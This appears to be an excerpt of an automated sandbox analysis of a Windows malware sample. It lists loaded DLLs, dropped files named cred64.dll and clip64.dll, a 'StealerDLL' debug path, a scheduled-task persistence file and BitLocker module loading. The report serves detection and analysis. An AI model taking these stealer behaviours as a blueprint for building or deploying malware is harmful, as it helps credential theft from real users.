Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: tOuVwTJrau.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: tOuVwTJrau.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: tOuVwTJrau.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: tOuVwTJrau.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: tOuVwTJrau.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: tOuVwTJrau.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: tOuVwTJrau.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: tOuVwTJrau.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2085742458.0000018FEDA2F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Target.pdbn: source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2084376768.0000018FED9C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A56-E329-4D4D1%0# source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA5D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.1.dr, cred64[1].dll.1.dr

Source: tOuVwTJrau.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tOuVwTJrau.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tOuVwTJrau.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tOuVwTJrau.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tOuVwTJrau.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: cred64[1].dll.1.dr	Static PE information: section name: _RDATA
Source: cred64.dll.1.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002F750F pushad ; iretd	0_2_002F7510
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002F3573 pushad ; ret	0_2_002F358D
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030A6B4 push ecx; ret	0_2_0030A6C7
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002FD989 pushfd ; retf 0000h	0_2_002FD98A
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000F7504 pushad ; iretd	1_2_000F7510
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000F3573 pushad ; ret	1_2_000F358D
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010A6B4 push ecx; ret	1_2_0010A6C7
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000F840A pushad ; iretd	2_2_000F840B
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000F750F pushad ; iretd	2_2_000F7510
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000F3573 pushad ; ret	2_2_000F358D
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010A6B4 push ecx; ret	2_2_0010A6C7
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000FD989 pushfd ; retf 0000h	2_2_000FD98A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B619A10 push ds; ret	11_2_00007FFD9B619A11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B6110DC push eax; retf	11_2_00007FFD9B61113B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B6EC2CB pushfd ; retn 0000h	11_2_00007FFD9B6EC2E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B6EC2E4 pushfd ; retn 0000h	11_2_00007FFD9B6EC2E5

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	File created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Jump to dropped file

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

File created: C:\Windows\Tasks\Gxtuum.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
